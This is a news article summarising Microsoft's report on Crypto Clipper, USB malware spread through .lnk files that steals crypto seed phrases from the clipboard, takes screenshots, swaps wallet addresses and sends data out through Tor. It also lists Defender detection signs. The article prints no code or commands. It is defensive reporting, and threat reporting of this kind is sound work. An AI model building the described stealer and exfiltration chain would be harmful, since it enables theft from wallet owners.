Microsoft says a new strain of USB malware is moving through removable drives and targeting cryptocurrency wallets, not by brute force but by quietly watching the clipboard, grabbing screenshots, and sending stolen data off through Tor. The company says the threat, dubbed Crypto Clipper, can also swap wallet addresses, which is the kind of tiny, nasty trick that turns a simple copy-paste into a payment to the wrong person.
The method is old-school in one sense and very current in another: removable media still gets people, while Tor and proxy chaining make the exfiltration harder to trace. That combination is a reminder that attackers do not need fancy exploits if they can sneak code onto a machine through a file people still trust far too much.
How Crypto Clipper spreads through .lnk files
According to Microsoft, the malware arrives on USB drives in .lnk files. Those shortcut files contain executable code that checks whether the malicious software is already present on the computer when the drive is plugged in; if not, the payload is loaded through Tor. To stay hidden, it also scans the drive and gives .lnk files lookalike names.
That approach is low-tech enough to be annoying and effective enough to matter. USB-based infections never really disappeared, especially in places where removable media still moves between offices, labs, and home machines with very little scrutiny.
Clipboard monitoring and wallet replacement
Crypto Clipper watches the clipboard for patterns that match standardized 12-word or 24-word seed phrases used to generate wallet private keys. When it finds a match, it sends the data and five screenshots captured over ten seconds to an external server. It can also replace cryptocurrency wallet addresses in transit, redirecting payments toward attacker-controlled wallets.
- Clipboard checks for 12-word and 24-word seed phrases
- Five screenshots taken within ten seconds after detection
- Wallet address swapping to redirect payments
- Data sent through Tor using a local SOCKS5 proxy
Microsoft says the malware does not rely on a traditional installer or exposed IP-based command-and-control infrastructure. Instead, it runs a portable Tor client and routes traffic through a local SOCKS5 proxy, which makes the operation harder to pin down and turns the stealer into something closer to a lightweight backdoor.
What Microsoft Defender looks for
Microsoft Defender for Endpoint reportedly flags parts of the malware as suspicious JavaScript processes and possible data leakage through Curl. Microsoft Defender labels the threat as Trojan: Win32/CryptoBandits.A.
Signs of infection include script interpreter launches tied to suspicious processes, use of a proxy on localhost:9050, PowerShell screen-capture commands, and signs that the clipboard is being checked or wallet addresses are being altered. If that combination shows up together, the machine is probably not having a good day.
Why Crypto Clipper matters for crypto wallet security
The interesting part is not just the theft, but the packaging. By blending credential theft, screen capture, clipboard abuse, and remote execution into one tool, Crypto Clipper follows a trend that security teams have been warning about for a while: commodity malware that behaves like a modular platform. Expect copycat campaigns to keep borrowing the same formula as long as crypto wallets stay attractive and USB hygiene stays sloppy.